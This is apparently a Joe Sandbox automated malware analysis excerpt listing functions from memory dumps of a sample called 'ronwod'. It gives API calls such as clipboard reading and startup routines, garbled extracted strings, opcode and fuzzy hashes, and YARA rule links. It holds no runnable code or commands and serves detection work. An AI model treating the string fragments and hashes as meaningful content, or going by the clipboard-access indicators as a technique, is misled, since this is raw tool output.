String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
API String ID: 0-594100160
Opcode ID: 0c0fef3f4132818802d57e26e03b134e228081f74f9f0a179b4cb6ab2e594000
Instruction ID: 8cda669412c27e51666a1a62386c0204135c6192b376c6f94add0d90d20452c3
Opcode Fuzzy Hash: 0c0fef3f4132818802d57e26e03b134e228081f74f9f0a179b4cb6ab2e594000
Instruction Fuzzy Hash: B3C1FCB15083028BD714DF59C86166BB3B2FFC1359F04892DE8868B3A9E7789654CB4A

Function 014516A0 Relevance: 11.1, APIs: 3, Strings: 2, Instructions: 2356COMMON

Download Yara Rule

Strings

`, xrefs: 014525BC
&8, xrefs: 014519C3

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: &8$`
API String ID: 0-842996520
Opcode ID: 101608bf798dd6cac524579af8ad5bf5a4fca983c555ec8833258642c2dc6b6d
Instruction ID: 3101ce78203a5dcf92fab8021356b7f3b3220cab89f76afd3a4ed02bd22c74b7
Opcode Fuzzy Hash: 101608bf798dd6cac524579af8ad5bf5a4fca983c555ec8833258642c2dc6b6d
Instruction Fuzzy Hash: DE13E476D042148FDB54DF78C8817AEBBF1BF55310F0586AED859AB3A2E7348941CB82

Function 00A111A3 Relevance: 10.6, APIs: 7, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00A111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A11238
__p__acmdln.MSVCRT ref: 00A11261
malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344
_amsg_exit.MSVCRT ref: 00A113EA
_initterm.MSVCRT ref: 00A1140C

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 439468ce30a519118d61e74ea7fa1286738464a11d6ffc332e8b3c6c2274f452
Instruction ID: 1c3379c75e77b8e49bc3321701751a89fa81e3594a079bb584e88a5f225cfe8d
Opcode Fuzzy Hash: 439468ce30a519118d61e74ea7fa1286738464a11d6ffc332e8b3c6c2274f452
Instruction Fuzzy Hash: 9D4139B4A083058FDB50DFA8E9843DDB7F1BB48344F11892DD9859B310DB78998ACB92

Function 00A11160 Relevance: 9.1, APIs: 6, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00A111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00A11238
__p__acmdln.MSVCRT ref: 00A11261
malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344
GetStartupInfoA.KERNEL32 ref: 00A11433

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: e24d8e1b2d59c389d640ae94f62e02a48ddaeb2a0ddc09cf5db35f5eda4c8a98
Instruction ID: f59185b0f8345618b40c3e91a483c73a69663c7e6f76f95f2abae58cb7667908
Opcode Fuzzy Hash: e24d8e1b2d59c389d640ae94f62e02a48ddaeb2a0ddc09cf5db35f5eda4c8a98
Instruction Fuzzy Hash: 7F516DB5A083158FDB10DFA8E9847DEB7F1FB48340F11852DEA459B310DB74A98ACB91

Function 014722E0 Relevance: 9.1, APIs: 6, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 014722F0
GetClipboardData.USER32 ref: 0147230B
GlobalLock.KERNEL32 ref: 0147232A
CloseClipboard.USER32 ref: 0147243D

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 73fc7e726cd26d788db49c6323d86b5e5fab7f92e4993bbab63e05f35f64702b
Instruction ID: 7e79f734871d0a5f30d666cfde20fd61fdebd7af90aa51789fc98dd3c52ae698
Opcode Fuzzy Hash: 73fc7e726cd26d788db49c6323d86b5e5fab7f92e4993bbab63e05f35f64702b
Instruction Fuzzy Hash: 9E3128B15083128FD340BFB9A1857AFBBF0EF94351F01582EE4C686225D7B9858AC753

Function 0144DA8B Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

d"P", xrefs: 0144DE49
6"", xrefs: 0144DEB1
"", xrefs: 0144DE61
D, xrefs: 0144DD75
p"F", xrefs: 0144DE11
"", xrefs: 0144DE91

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 6""$D$d"P"$p"F"$""$""
API String ID: 0-1382292853
Opcode ID: 6849d011dbaaacb63385986255f1ea1c2d0e10fd79ec09e667480446ab2f4e14
Instruction ID: 5968393123cc8c0aecc25347711a8fbbe26f7c55e3c43db34ea6e4fb39af9187
Opcode Fuzzy Hash: 6849d011dbaaacb63385986255f1ea1c2d0e10fd79ec09e667480446ab2f4e14
Instruction Fuzzy Hash: 46B1E3B04083829BE728CF85C69476BBBF1FF95748F104A8DE5951B2A0D3F58648DF86

Function 01465770 Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

o2x2, xrefs: 01465993
}2q2, xrefs: 01465983
M2x2, xrefs: 014659B3
m2?2, xrefs: 014659AB
u202, xrefs: 0146598B
c2o2, xrefs: 014659BB

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
API String ID: 0-1290146539
Opcode ID: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction ID: e7d468290007e019451e57a99399677e74b297609fc91acaaf5dc8bbce41081d
Opcode Fuzzy Hash: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction Fuzzy Hash: 38610CB19083508BD724DF19C98066BB6F5FFC1368F08892EE8855F3A5E7798904CB87

Function 01466990 Relevance: 7.6, Strings: 6, Instructions: 104COMMON

Download Yara Rule

Strings

-M M, xrefs: 014671C4
>M5M, xrefs: 0146718D
%M)M, xrefs: 01467198
MM, xrefs: 0146710C
4M:M, xrefs: 014671AE
)M-M, xrefs: 0146712A

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
API String ID: 0-1618744259
Opcode ID: 5c72d8baa28bc1e098f16e3365c208bf3b370cca363fcad96a069c61452d8302
Instruction ID: 8aed6fd74dbc1a86c4c7972993cd65362dd31816b92feda370fc9d8929c2e3da
Opcode Fuzzy Hash: 5c72d8baa28bc1e098f16e3365c208bf3b370cca363fcad96a069c61452d8302
Instruction Fuzzy Hash: 02419DB06193848AE3249F24E44079BBBB5FB91358F16482DE4C89B325E7368445CF57

Function 0144F529 Relevance: 7.1, Strings: 5, Instructions: 860COMMON

Download Yara Rule

Strings

", xrefs: 0144F8AB
Vr, xrefs: 0144F58B
EN, xrefs: 0144F982
+, xrefs: 0144FE16
L, xrefs: 0144FC97

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "$+$EN$L$Vr
API String ID: 0-3667360776
Opcode ID: 704fe1d5efb1bfb7f6ced4ae41c5a07aa5b487db5ee1ec9c121ed734e541dfcb
Instruction ID: 5d3342d9e447b0380cf45de6a36338228b7817b5b11a73376ea912a40c9ccc6b
Opcode Fuzzy Hash: 704fe1d5efb1bfb7f6ced4ae41c5a07aa5b487db5ee1ec9c121ed734e541dfcb
Instruction Fuzzy Hash: 4E72B1765087418BE3689F38C4553AFBBE1AF95320F054A2EE9AAC73E1D77888418743

Function 01459930 Relevance: 6.8, APIs: 2, Strings: 1, Instructions: 1513COMMON

Download Yara Rule

APIs

Part of subcall function 0147CD20: LdrInitializeThunk.NTDLL(0148009B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0147CD4E

FreeLibrary.KERNEL32(?), ref: 0145A030
FreeLibrary.KERNEL32(?), ref: 0145A0CE

Strings

Fn@n, xrefs: 01459D65

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: Fn@n
API String ID: 764372645-2265005453
Opcode ID: 7579b1ff79513488eca2c0560e8e807989eda8ae4b6e27168883d6d465e67a0c
Instruction ID: cac8bb24c1d9b52d509a53ceb5463c744dd2a37df7c070f8d421c4d174498deb
Opcode Fuzzy Hash: 7579b1ff79513488eca2c0560e8e807989eda8ae4b6e27168883d6d465e67a0c
Instruction Fuzzy Hash: 63A212766083119FE761CE28C88077FBBE2BFC4704F19492EEE8597362D77298458782

Function 014551A9 Relevance: 6.7, Strings: 5, Instructions: 496COMMON

Download Yara Rule

Strings

_KT!, xrefs: 014554A6
C!ZZ, xrefs: 0145547A
sG, xrefs: 01455596
@U, xrefs: 01455578
L4, xrefs: 014557E0

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: C!ZZ$_KT!$@U$sG$L4
API String ID: 0-1645361861
Opcode ID: 09309fc402ff8f63b55616637aa990776b77b4132821ed2c2fa6315739e08c61
Instruction ID: 338af93271fead2e8abf970077184cf565b221115d06ea3cab4dac1da231a791
Opcode Fuzzy Hash: 09309fc402ff8f63b55616637aa990776b77b4132821ed2c2fa6315739e08c61
Instruction Fuzzy Hash: 2AE12176618301DFD7659F28D8407AFB7E6EFC4314F15892DE88A8B262EB3098518B42

Function 014590D1 Relevance: 6.5, Strings: 5, Instructions: 291COMMON

Download Yara Rule

Strings

LSES, xrefs: 014590F4
FS;S, xrefs: 014590FF
7S>S, xrefs: 014592C8
MR, xrefs: 0145926A
SS, xrefs: 01459254

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 7S>S$FS;S$LSES$MR$SS
API String ID: 0-2954923458
Opcode ID: 5ca4b6147654a95c39b08ee3425ce29bc5bdc3158fd1e2c4a727a45665ee69cc
Instruction ID: 482f6b001ede1c226066183f3e99321594cf9af83f0d9753524120cdd1bc3d33
Opcode Fuzzy Hash: 5ca4b6147654a95c39b08ee3425ce29bc5bdc3158fd1e2c4a727a45665ee69cc
Instruction Fuzzy Hash: 2FB155B1909391CBD3718F19C4907EFF7A2AF86705F54992DD8C98B361EBB48542CB82

Function 01458170 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 014584AC

Strings

S-#9, xrefs: 01458929, 01458975

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: S-#9
API String ID: 237503144-700798346
Opcode ID: b225667e7db7731f87b38896d4514879f008afb3417183b88c10333df52241d3
Instruction ID: d79248fa9c6676261b86cdd535038ccc539ae278544b52d4784dfa358f582f6d
Opcode Fuzzy Hash: b225667e7db7731f87b38896d4514879f008afb3417183b88c10333df52241d3
Instruction Fuzzy Hash: 15E1E676A042128BD724CF29C8517ABB7E2EFD4324F19892DE8C99B365EF38D941C741

Function 01461570 Relevance: 5.6, Strings: 4, Instructions: 586COMMON

Download Yara Rule

Strings

H, xrefs: 01461863
H, xrefs: 01461859
,, xrefs: 01461B60
!@, xrefs: 014615A3

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$H$H
API String ID: 383220839-4170808191
Opcode ID: fe1c1fc67504b516fe287f9b18db4c196894b2d2940eadf485ccd43a4d3853d8
Instruction ID: 5e0157700609000ca43864996ade98cc8cc05faa548b3917cb0d8b43dcb262b3
Opcode Fuzzy Hash: fe1c1fc67504b516fe287f9b18db4c196894b2d2940eadf485ccd43a4d3853d8
Instruction Fuzzy Hash: BF32A0716083418FD3289F28C4913AFBBE6AFC5718F19892EE5D5873A1E7798845CB43

Function 01472AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 01472B27
GetSystemMetrics.USER32 ref: 01472B36

Strings

, xrefs: 01472BE4

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c0e3924ca52bf8cde670c1f105f93c56749b389c27d36621f441fe8008c94b21
Instruction ID: fd964a28afd7b6efdc44335ebe5564c74be47b347b075cc0cc23cd43bc5f12c5
Opcode Fuzzy Hash: c0e3924ca52bf8cde670c1f105f93c56749b389c27d36621f441fe8008c94b21
Instruction Fuzzy Hash: 8A3172B09143148FDB10EF68D985A5DBFF4BB88304F11852EE898DB364D7B4A959CF82

Function 0144EB3B Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 661COMMON

Download Yara Rule

Strings

m, xrefs: 0144EB49

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-53672527
Opcode ID: 9a466662b9d6d189237fe31c8b404b99f75c6b811def94885b9116a6addd876d
Instruction ID: bbfe96f6100550f5b97849a1e83e28142f629ec6abe792773d81fe1aae22f848
Opcode Fuzzy Hash: 9a466662b9d6d189237fe31c8b404b99f75c6b811def94885b9116a6addd876d
Instruction Fuzzy Hash: 9B42B175A187518BE324DF79C4903AFB7E1BF94310F158A2ED8D9873A1E77888458B43

Function 01466520 Relevance: 4.1, Strings: 3, Instructions: 380COMMON

Download Yara Rule

Strings

{$[7, xrefs: 01466936
l'Y9, xrefs: 01466913
X`X*, xrefs: 0146691B

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: X`X*$l'Y9${$[7
API String ID: 2994545307-1509796914
Opcode ID: 23dd077d3fee58d6359d6e58f70dffea52d2182aff7e58dec3369748cc1efedc
Instruction ID: 6044877ac1055b1e52b0d1344f82928a5a3dd125329ead402a285dfa90b3d8ee
Opcode Fuzzy Hash: 23dd077d3fee58d6359d6e58f70dffea52d2182aff7e58dec3369748cc1efedc
Instruction Fuzzy Hash: A6B14DB2A043155BEB24CE28C4416AB77A6EFD4708F07852EED459B365E335EC09C3D2

Function 01449570 Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

mX, xrefs: 014495E3
pid, xrefs: 01449628
bC, xrefs: 014499A3

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: bC$mX$pid
API String ID: 0-825546773
Opcode ID: 9ddd6c1abd30c6ddd7228ba955b8cd19c80f0641d7a9d1be888c822ee8e06805
Instruction ID: 50fd2a9ab8ecbc41821f0b4c4524d76028c7d8ffe6e64ed7b759daf2b8643612
Opcode Fuzzy Hash: 9ddd6c1abd30c6ddd7228ba955b8cd19c80f0641d7a9d1be888c822ee8e06805
Instruction Fuzzy Hash: 38C125B15183118BE328CF24C8516AFBBE5FF84304F15592DE5AADB360E734D505CB96

Function 01450C83 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 01450E57

Strings

zI, xrefs: 01451121

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: zI
API String ID: 237503144-2601089719
Opcode ID: e0bcf5f92d00557636c7fb5372743533d68d708fe14a9be9fa3be6249270f219
Instruction ID: 6808730da8bea9bd04c31ca329b01db9e627572c086777f9a5ffc240bc596d89
Opcode Fuzzy Hash: e0bcf5f92d00557636c7fb5372743533d68d708fe14a9be9fa3be6249270f219
Instruction Fuzzy Hash: FC12E475A097518BD368DF38C5913AFB7E1AF94720F158A2EE8EA873E1DB3484418743

Function 01444BE0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

0, xrefs: 0144551E
8, xrefs: 01445516

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 795cb1bf005dccc2f06de4a9d4d150e1339f7d7ec0a842d0dc25c3e35b088c14
Instruction ID: 522d5939e1bc3922382aa3387bf99e6b1644c32035770fec8a76b8f6c9c2af24
Opcode Fuzzy Hash: 795cb1bf005dccc2f06de4a9d4d150e1339f7d7ec0a842d0dc25c3e35b088c14
Instruction Fuzzy Hash: EC726A716083419FEB15CF18C894B6BBBE1BF84314F48891EF9898B3A1D375D958CB92

Function 014669B0 Relevance: 3.0, Strings: 2, Instructions: 529COMMON

Download Yara Rule

Strings

ct, xrefs: 01466FBD
`], xrefs: 01466FAD

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: `]$ct
API String ID: 0-3656906445
Opcode ID: 985c323f71982c421ee9d93b50bfdce6cc6e190f63b701889904ce0b175d1a2d
Instruction ID: 7ed58c338264611974fa7089df367567157af39f38c72b3d5a12ab1fa9b9135e
Opcode Fuzzy Hash: 985c323f71982c421ee9d93b50bfdce6cc6e190f63b701889904ce0b175d1a2d
Instruction Fuzzy Hash: ED0214B19183418FD714CF29D49026FBBE5EFD5308F0A882EE9998B361E735D905CB92

Function 01449100 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

@, xrefs: 01449266
^~dx, xrefs: 014491FE

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @$^~dx
API String ID: 0-212991012
Opcode ID: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction ID: f0e79340bb637c851abae6bbad21544205e603eea2f07af80f8b7b5871fdc6f6
Opcode Fuzzy Hash: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction Fuzzy Hash: F1C1F17160C3918BE726CF69C4403ABBBE1AF8B304F0858ADE4D5DB392D239C505D7A6

Function 01469630 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

517, xrefs: 01469846
02"4, xrefs: 014697E5

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 517$02"4
API String ID: 0-4117730321
Opcode ID: e55193d53b38d69b5080458addd9b3e53327d08f0f362dd2238e23175fc76da0
Instruction ID: 5544528d2931d75c64f6f7483ae4724a377133fba08bba4e13d7adef4ee2e6e1
Opcode Fuzzy Hash: e55193d53b38d69b5080458addd9b3e53327d08f0f362dd2238e23175fc76da0
Instruction Fuzzy Hash: DDD14271A0C350DFE3149F28D88076FBBE5AF99318F45892EE489873B2D3758805CB42

Function 014442A0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0144431B
IEND, xrefs: 01444691

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 3f292b105f709eb1d64f6c20520f8debf0647fadbfdf0fd3386468f1ff553168
Instruction ID: 9e00d6af54b88b8ff926421573e581ef7acb8f8e6a7210ee2125573af4f7060f
Opcode Fuzzy Hash: 3f292b105f709eb1d64f6c20520f8debf0647fadbfdf0fd3386468f1ff553168
Instruction Fuzzy Hash: CAD1C271A08345DFE720CF18D841B5FBBE4ABA4304F08492EF9989B391D775E909CB92

Function 0145602C Relevance: 2.8, Strings: 2, Instructions: 319COMMON

Download Yara Rule

Strings

@g, xrefs: 01456034
D, xrefs: 01456417

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @g$D
API String ID: 0-2006007467
Opcode ID: d36c4b681cd6bad79625a2aea73f2b26a39936cbaa37e14764fc507d5a67c9a8
Instruction ID: 88955f21ea3e395617f663ce519259379bc8bdda4afdc5de4f777d61b13e522a
Opcode Fuzzy Hash: d36c4b681cd6bad79625a2aea73f2b26a39936cbaa37e14764fc507d5a67c9a8
Instruction Fuzzy Hash: FEB1D0B1418310CBD368CF18C86576BB7F0FF86355F058A5DE8CA6B6A1E7789904CB46

Function 01455A72 Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

gfff, xrefs: 01455C27
7, xrefs: 01455BCA

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 5a6fdb2657e59e67b7bb3165743942b33b4763acd032a3227d0d82013a32e183
Instruction ID: 4fe5f7669e25d75ddcf63d5419838fe41e6719d9efbd06d85cc94a2312070864
Opcode Fuzzy Hash: 5a6fdb2657e59e67b7bb3165743942b33b4763acd032a3227d0d82013a32e183
Instruction Fuzzy Hash: D4A15B73A146214BD368CF29CC817BBB6D3BBC4314F4AC62DD989DB355EA78984287C0

Function 014482C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

${*{, xrefs: 014483BB
., xrefs: 01448319

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ${*{$.
API String ID: 0-434639839
Opcode ID: b5096770a23798b8da29d89cf5b92995018fff425a48dc5b4bec42bbd317a0a6
Instruction ID: f492435bbb4202b93e41c2cf0b997416f467c94604b9f641e651fb56577f10a2
Opcode Fuzzy Hash: b5096770a23798b8da29d89cf5b92995018fff425a48dc5b4bec42bbd317a0a6
Instruction Fuzzy Hash: 5B813E32F043174BE3119EADC8C425BBBE2ABC1724F598A6AD9955B3B9E334CC4647C1

Function 0147DB39 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

@, xrefs: 0147DB9D
@, xrefs: 0147DA4D

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: fcdd78297689787c303c421353a8e0a2a8c31f876755ac7004dde0caa27e945d
Instruction ID: 6ce66ca72415915d568f076abe948cf9776d1c68fe30bf5d26dd434fa8d96dbf
Opcode Fuzzy Hash: fcdd78297689787c303c421353a8e0a2a8c31f876755ac7004dde0caa27e945d
Instruction Fuzzy Hash: D351F6B1A293208BD714CF28C95036BB6E2FFD9744F04993DD4C5A73A8E7399844C796

Function 0144E9B0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

_@, xrefs: 0144EA5A
t,, xrefs: 0144E9D0

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: _@$t,
API String ID: 0-2713372951
Opcode ID: 918df8aa34d2cae7cc95190ed90cecb05205cc1697a32d838d4e654b4b2af4ce
Instruction ID: 7921d5c33a9e7e79d024177ac94051f181d1136b099c5b7f6bee94e9b55cac8a
Opcode Fuzzy Hash: 918df8aa34d2cae7cc95190ed90cecb05205cc1697a32d838d4e654b4b2af4ce
Instruction Fuzzy Hash: 8A51C07251875087E7259F3984112AFB6E1BFA5B30F158B2FE8F6973E1DA348801C792

Function 0147B940 Relevance: 1.9, Strings: 1, Instructions: 652COMMON

Download Yara Rule

Strings

f, xrefs: 0147BB51

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

